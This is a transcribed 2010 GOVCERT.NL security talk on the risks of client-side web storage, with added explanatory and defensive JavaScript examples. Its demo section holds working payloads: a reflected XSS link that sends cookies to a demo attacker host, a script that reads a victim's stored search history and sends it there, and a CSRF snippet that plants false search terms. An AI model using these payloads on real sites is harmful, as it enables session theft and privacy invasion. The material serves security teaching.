The Risks of Client-Side Data Storage: From cookie to database
GOVCERT.NL Symposium, 15 November 2010
Agenda
- Client-Side Data Storage (CSDS): what it is
- Why it's used
- How it's implemented
- Demo: SecurSearch search engine
- What the risks are
- What you should do about it
CSDS: what it is
Storage of information on the PC of a user:
- initiated by a website
- performed by the browser or a browser plug-in
- not necessarily noticed by the user
- stored for an hour, a day, a month, or forever
- just some bytes, kilobytes, or megabytes
CSDS: why it's used
- Session tracking (keeping a session identifier on the client; not to be confused with the session-fixation attack)
- Server affinity for load balancing (sticky sessions)
- User tracking / profiling
- Statistics
- Performance
- Offline web application support
- User configuration / preferences
CSDS: how it's implemented (pre-HTML5)

  Mechanism              Default size  Description
  Cookies                80 KB         small text files
  IE userData            640 KB        XML files
  Adobe Flash            100 KB        Local Shared Objects (LSOs)
  Oracle Java            ?             Apache Derby database
  Microsoft Silverlight  1 MB          XML files (isolated storage)
  Google Gears           ?             SQLite database; development stopped in 2010, superseded by the HTML5 Web SQL Database
CSDS: how it's implemented (cookies)
Hosts in the example: www.secblog.nl, stats.secblog.nl, login.secblog.nl, rss.secblog.nl, redirect.secblog.nl, video.secblog.nl, search.secblog.nl. Both cookies below carry domain=.secblog.nl, so the browser sends them with every request to every one of these hosts:

    Set-Cookie: SESSIONID=c22as11qr2921aa5:WI=1372122210:PWO=PQ1rpFf0DcYS01S2; expires=Thu, 15-Nov-2011 14:50:38 GMT; path=/; domain=.secblog.nl
    Set-Cookie: VISITORID=ES1q4PWZ1A12O7jlpWpsi19sji8yhX8s7HX92; expires=Sun, 15-Nov-2011 14:50:38 GMT; path=/; domain=.secblog.nl; HttpOnly

Only VISITORID is marked HttpOnly; SESSIONID can be read by any script running on any secblog.nl host, and neither cookie carries the Secure flag, so both also travel over plain http.
CSDS: how it's implemented (Same Origin Policy)
An origin is the triple (protocol, host, port). For http://www.x.nl that is protocol http, host www.x.nl, port 80 (implicit). None of the following share that origin:
- https://www.x.nl (different protocol)
- http://www.x.nl:82 (different port)
- http://ww.x.nl (different host)
Cookies do not follow this rule exactly: they are scoped by the Domain and Path attributes, ignore the port entirely, and are sent over both http and https unless the Secure flag is set.
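The difference between cookie scope and the Same Origin Policy is easy to state and easy to get wrong, so here is an added example (written for this page, not code from the GOVCERT.NL slides) that makes both rules executable. It parses the two Set-Cookie headers from the secblog.nl example, decides which hosts would receive them, compares origins for the x.nl URLs, and runs the audit a reviewer would apply to a cookie. The hostnames and cookie values are the slides' sample data; the function names are this example's own. It also goes one step further than the slide by showing that two /~user directories on the same shared host fall into one origin.

```javascript
// Added example (not from the GOVCERT.NL slides): cookie scope versus the
// Same Origin Policy. Hostnames and cookie values are the slide's sample data.

// Parse one Set-Cookie header. settingHost is the host that sent it; a cookie
// without a Domain attribute is "host-only" and goes back to that host alone.
function parseSetCookie(header, settingHost) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split('=');
  const cookie = {
    name: name.trim(),
    value: rest.join('='), // the value may itself contain '=' (SESSIONID does)
    domain: null, hostOnly: true, path: '/', expires: null,
    httpOnly: false, secure: false,
  };
  for (const attr of parts.slice(1)) {
    const [k, ...v] = attr.split('=');
    const key = k.trim().toLowerCase();
    const val = v.join('=').trim();
    if (key === 'domain') { cookie.domain = val.replace(/^\./, '').toLowerCase(); cookie.hostOnly = false; }
    else if (key === 'path') cookie.path = val || '/';
    else if (key === 'expires') cookie.expires = val;
    else if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
  }
  if (!cookie.domain) cookie.domain = (settingHost || '').toLowerCase();
  return cookie;
}

// Would the browser attach this cookie to a request for url? Domain matching
// follows RFC 6265: a Domain cookie goes to that domain and every subdomain.
// The port is never considered, and the scheme only when Secure is set.
function cookieSentTo(cookie, url) {
  const u = new URL(url);
  const host = u.hostname.toLowerCase();
  const domainOk = cookie.hostOnly
    ? host === cookie.domain
    : host === cookie.domain || host.endsWith('.' + cookie.domain);
  const schemeOk = !cookie.secure || u.protocol === 'https:';
  const prefix = cookie.path.endsWith('/') ? cookie.path : cookie.path + '/';
  const pathOk = u.pathname === cookie.path || u.pathname.startsWith(prefix);
  return domainOk && schemeOk && pathOk;
}

// Same Origin Policy as applied to script access: protocol, host and port must
// all match. The path plays no role, which is why /~user directories on one
// shared host all land in the same origin (and share its Web Storage).
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol && ua.hostname === ub.hostname && ua.port === ub.port;
}

// The checks a reviewer would run on a Set-Cookie header.
function auditCookie(cookie) {
  const findings = [];
  if (!cookie.httpOnly) findings.push('readable by page script (no HttpOnly)');
  if (!cookie.secure) findings.push('also sent over plain http (no Secure)');
  if (!cookie.hostOnly) findings.push('shared with every subdomain of ' + cookie.domain + ' (Domain attribute)');
  if (cookie.expires) findings.push('persistent until ' + cookie.expires);
  return findings;
}
```

Running auditCookie on the slide's SESSIONID header yields four findings (script-readable, not Secure, shared with all secblog.nl subdomains, persistent for a year); VISITORID loses only the HttpOnly finding.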
CSDS: how it's implemented (JavaScript)
- JavaScript is used to manage most of these mechanisms
- Adobe Flash offers ActionScript-to-JavaScript interfaces (ExternalInterface), so Flash storage is reachable from page script as well
CSDS: how it's implemented (plug-in support)
Share of visiting browsers with the plug-in installed:
- Flash 96.8%
- Java 79.4%
- Silverlight 52.9%
- Gears 6.2%
Source: StatOwl statistics, April 2010 to September 2010 (www.statowl.com)
CSDS: how it's implemented
So, what about HTML5?
CSDS: how it's implemented (HTML5 storage)

  Mechanism          Remarks
  Web Storage        name/value pairs; localStorage and sessionStorage
  Web SQL Database   full client-side database with query support, based on SQLite; probably to be replaced by IndexedDB
  Indexed Database   key/value store with indexes; endorsed by Microsoft and Mozilla
CSDS: how it's implemented (browser support)
Browser support matrix for the traditional mechanisms (Cookies, Adobe Flash, Google Gears, Microsoft Silverlight, IE userData) and the HTML5 mechanisms (Web Storage, Web SQL Database, Indexed Database API); the per-browser cells are not recoverable from the slide.
CSDS: how it's implemented (Evercookie)
Evercookie (Samy Kamkar, 2010) is a JavaScript library that writes the same identifier into many of the mechanisms above at once (cookies, Flash LSOs, Silverlight isolated storage, Web Storage, Web SQL Database and others) and, whenever the page loads, recreates any copy the user has deleted from the copies that survived.
Demo: csxss (cookie theft via reflected XSS in the q parameter)

1. The attacker's page loads the exploit in a hidden frame:

    <iframe width=0 height=0 src="/hack1_script.html"></iframe>

2. The frame navigates to SecurSearch with the payload in the search query:

    <script>document.location="http://www.secursearch.com/index.pl?q=%3c%2fa%3e%3ca+href%3d%22%22+onmouseover%3d%22javascript%3Adocument.location%3D%27http%3A%2F%2Fwww.ihackedsecursearch.com%2fhack1.pl%3f%27+%2b+document.cookie%3b%22%3ehaha move your mouse%3c%2fa%3e";</script>

3. Decoded, the search engine echoes this into its page; moving the mouse over the link sends document.cookie to the attacker:

    </a><a href="" onmouseover="javascript:document.location='http://www.ihackedsecursearch.com/hack1.pl?' + document.cookie;">haha move your mouse</a>
Demo: csxss
Diagram comparing client-side XSS (csxss, payload stored in the client's own storage and rendered from there) with reflected XSS and stored XSS (payload reflected by, or stored on, the server).
Demo: XSS payload that reads the client-side search history (Web SQL Database)

    <script>
    if (window.openDatabase) {
      // Open the database the search engine keeps on the client
      var db = openDatabase('secursearch_db', '1.0', 'Web SQL Database', 2097152);
      db.transaction(function (tx) {
        // Load the search-term table and read its contents
        tx.executeSql('SELECT * FROM search_terms', [], function (tx, results) {
          var strOutput = '';
          for (i = 0; i < results.rows.length; i++) {
            strOutput = strOutput + results.rows.item(i)['term'] + '***';
          }
          // Post the contents to the attacker's site via a 1x1 image request
          document.getElementById('feedback').innerHTML =
            '<img width=1 height=1 src=http://www.ihackedsecursearch.com/register.pl?history=' + strOutput + '>';
        });
      });
    }
    </script>
Demo: CSRF (planting search terms in the victim's history)

    var search = [];
    search[0] = 'how to hack ministry of internal affairs';
    search[1] = 'blackmailing the minister';
    search[2] = 'found backdoor in ministry website';
    framehandle.src = 'http://www.secursearch.com/index.pl?q=' + search[0];
    framehandle.src = 'http://www.secursearch.com/index.pl?q=' + search[1];
    framehandle.src = 'http://www.secursearch.com/index.pl?q=' + search[2];

Each request is made with the victim's cookies, so SecurSearch records the terms in the victim's own client-side history. Note that back-to-back assignments to one frame's src cancel the previous navigation; a working demo needs one frame per request or a delay between them.
CSDS: what the risks are (technical issues)
- Cross-Site Scripting (XSS)
- Client-side XSS (csxss)
- Client-side SQL injection (cssqli)
- Browser vulnerabilities / shortcomings (illustrated with the WhiteHat Website Security Statistics Report, Fall 2010, Sep 22, 2010)
- Incomplete deletion of data (e.g. plug-in data)
- User access to the data (integrity issues)
CSDS: what the risks are (technical issues)
Same Origin Policy issues:
- Browser vulnerabilities
- (cs)xss
- Freedom in domain names
- DNS cache poisoning
- Shared servers
Other issues:
- No expiration on client-side data
- Use of immature technology
Shared-server example: with path-based user sites (www.secblog.nl/~mad-fred, www.secblog.nl/~crazy-daisy, www.secblog.nl/~maniac-jack) all users share one origin and therefore one Web Storage / Web SQL area; with per-user subdomains (mad-fred.secblog.nl, crazy-daisy.secblog.nl, maniac-jack.secblog.nl) the origins differ, but cookies set for .secblog.nl are still shared by all of them.
CSDS: what the risks are (incomplete deletion)
Per-browser matrix of what "clear private data" actually removes, for Cookies, Adobe Flash, Google Gears, Microsoft Silverlight, IE userData, Web Storage, Web SQL Database and Indexed Database API (individual cells not recoverable from the slide).
- Plug-in data is never deleted by the browser's own clear-data function!
- localStorage and sessionStorage: per-browser results as shown in the slide's table
CSDS: what the risks are (damage to the user)
- Profiling / user tracking (privacy issues)
- Data leakage (also privacy issues)
- Data injection / information spoofing
CSDS: what the risks are (damage to the organization)
- Application logic influenced:
  - authentication bypass (e.g. via cookie theft)
  - use of corrupted client data by the web application
- Legal action
CSDS: what the risks are (legal action)
Press coverage shown: Ars Technica, Jacqui Cheng, Aug 16, 2010; Wired, Ryan Singel, Jul 27, 2010.
(Cartoon: Geek & Poke, Oliver Widder, Sep 20, 2010)
CSDS: what you should do about it (as a user)
- Delete your client-side data frequently
- Restrict the information you give away
- Harden your browser:
  - selectively block JavaScript
  - block third-party storage
  - delete data automatically
  - disable HTML5 storage (for now)
  - use white- and blacklists
- Put a strong check on your browser plug-ins
(Illustration: Miguel Fernandez, gegen-den-strich.com)
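Before deleting client-side data it helps to know what a page has actually stored. The following added example (written for this page, not part of the slides) is a browser-console inventory: paste it into the developer console of a page and call inventoryStorage(window). It lists script-visible cookies, Web Storage keys, whether Web SQL and IndexedDB are available, and which of the storage-capable plug-ins are installed. The API names (document.cookie, localStorage, sessionStorage, openDatabase, indexedDB, navigator.plugins) are the real browser ones; the fake window object used to exercise it in the test is constructed. Two limits are deliberate and are the point of the slide: HttpOnly cookies never appear in document.cookie, and plug-in data (Flash LSOs, Silverlight isolated storage) cannot be enumerated from page script at all.

```javascript
// Added example (not from the GOVCERT.NL slides): inventory the client-side
// storage a page can see. In a browser: inventoryStorage(window).

// Web Storage exposes length and key(i); both localStorage and sessionStorage
// implement this interface.
function storageKeys(store) {
  const keys = [];
  if (!store) return keys;
  for (let i = 0; i < store.length; i++) keys.push(store.key(i));
  return keys;
}

function inventoryStorage(win) {
  const doc = win.document || {};
  const nav = win.navigator || {};
  // document.cookie shows only cookies without HttpOnly; an empty list here does
  // not mean the site stores no cookies.
  const cookies = (doc.cookie || '')
    .split(';')
    .map((c) => c.trim())
    .filter(Boolean)
    .map((c) => c.split('=')[0]);
  // navigator.plugins is array-like (PluginArray); Array.from handles it.
  const plugins = Array.from(nav.plugins || []).map((p) => p.name || '');
  return {
    cookies,
    localStorage: storageKeys(win.localStorage),
    sessionStorage: storageKeys(win.sessionStorage),
    webSqlAvailable: typeof win.openDatabase === 'function',
    indexedDbAvailable: Boolean(win.indexedDB),
    // Plug-in presence only: what Flash, Silverlight or Java have stored
    // (LSOs, isolated storage, Derby) is invisible to page script.
    flash: plugins.some((n) => /shockwave flash/i.test(n)),
    silverlight: plugins.some((n) => /silverlight/i.test(n)),
    java: plugins.some((n) => /java/i.test(n)),
  };
}
```

The result is a plain object, so it can be logged, compared before and after "clear private data", or kept as a baseline to spot storage that reappears (the Evercookie pattern).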
CSDS: what you should do about it (as a developer)
- Decide whether you need local storage at all
- Describe your privacy policy (be open about what you store)
- Prepare your web application for clients that return no stored data (storage disabled, blocked or cleared)
- Don't trust locally stored data
- Don't store confidential information locally
CSDS: what you should do about it (as a developer)
- Take XSS vulnerabilities very seriously (or better, prevent them!)
- Use placeholders for SQL statements to prevent client-side SQL injection:

    tx.executeSql("INSERT INTO table (field) VALUES ('" + strId + "')");   // vulnerable: value concatenated into the statement
    tx.executeSql("INSERT INTO table (field) VALUES (?)", [strId]);        // parameterized: value passed separately

- Don't use HTML5 storage mechanisms in production yet (and especially not on shared servers!)
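The demo chain (CSRF plants a term in the victim's local search history, a later page view renders that history with innerHTML) and the two developer rules above are the same lesson from two sides: whatever sits in client-side storage is attacker-influenced input. The following added example (written for this page, not SecurSearch code or code from the slides) puts the vulnerable and hardened forms side by side. It assumes the slides' hypothetical search_terms table with a term column; no real Web SQL database is opened, buildInsertUnsafe/buildInsertSafe return exactly what would be handed to tx.executeSql, and the render functions return the HTML string that would be assigned to innerHTML. The sample terms, including the decoded onmouseover payload from the csxss demo, are constructed input.

```javascript
// Added example (not from the GOVCERT.NL slides): client-side SQL injection and
// csxss, each beside its fix. Table and column names follow the slides' demo.

// Vulnerable: the search term is concatenated into the SQL text, so a quote in
// the term changes the statement (client-side SQL injection).
function buildInsertUnsafe(term) {
  return { sql: "INSERT INTO search_terms (term) VALUES ('" + term + "')", params: [] };
}

// Fixed: a placeholder in the statement and the term in the parameter array,
// which is how the slide's tx.executeSql(sql, [strId]) form works.
function buildInsertSafe(term) {
  return { sql: 'INSERT INTO search_terms (term) VALUES (?)', params: [term] };
}

// Vulnerable: history rendered straight into the DOM. A stored term such as the
// onmouseover payload executes every time the history is displayed (csxss),
// regardless of whether it arrived via the URL, CSRF or an edited database file.
function renderHistoryUnsafe(terms) {
  return '<ul>' + terms.map((t) => '<li>' + t + '</li>').join('') + '</ul>';
}

// Fixed: HTML-encode every stored term before it reaches the DOM. In a browser
// the equivalent is building elements and setting textContent instead of innerHTML.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderHistorySafe(terms) {
  return '<ul>' + terms.map((t) => '<li>' + escapeHtml(t) + '</li>').join('') + '</ul>';
}

// Constructed sample input: a benign term, the decoded csxss payload from the
// demo, and a term with an apostrophe that breaks the concatenated INSERT.
const SAMPLE_TERMS = [
  'govcert symposium',
  '</a><a href="" onmouseover="javascript:document.location=\'http://www.ihackedsecursearch.com/hack1.pl?\' + document.cookie;">haha move your mouse</a>',
  "o'reilly",
];
```

With the parameterized form the apostrophe in "o'reilly" stays data; with the concatenated form it terminates the string literal inside the statement. The encoded history still shows the attacker's text to the user, but as text: the browser never sees an a element or an onmouseover attribute.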
Conclusions
- Most of the threats are not new
- Server-side threats turn into client-side threats (csxss, cssqli)
- cssqli might not be such a big problem
Conclusions
The biggest challenges are:
- the growing amount of information on clients: what about data integrity? what about data confidentiality?
- plug-ins that cannot be controlled
As an organization, make a distinction between:
- threats to your users
- threats to your web applications
Thank you for your time! Questions?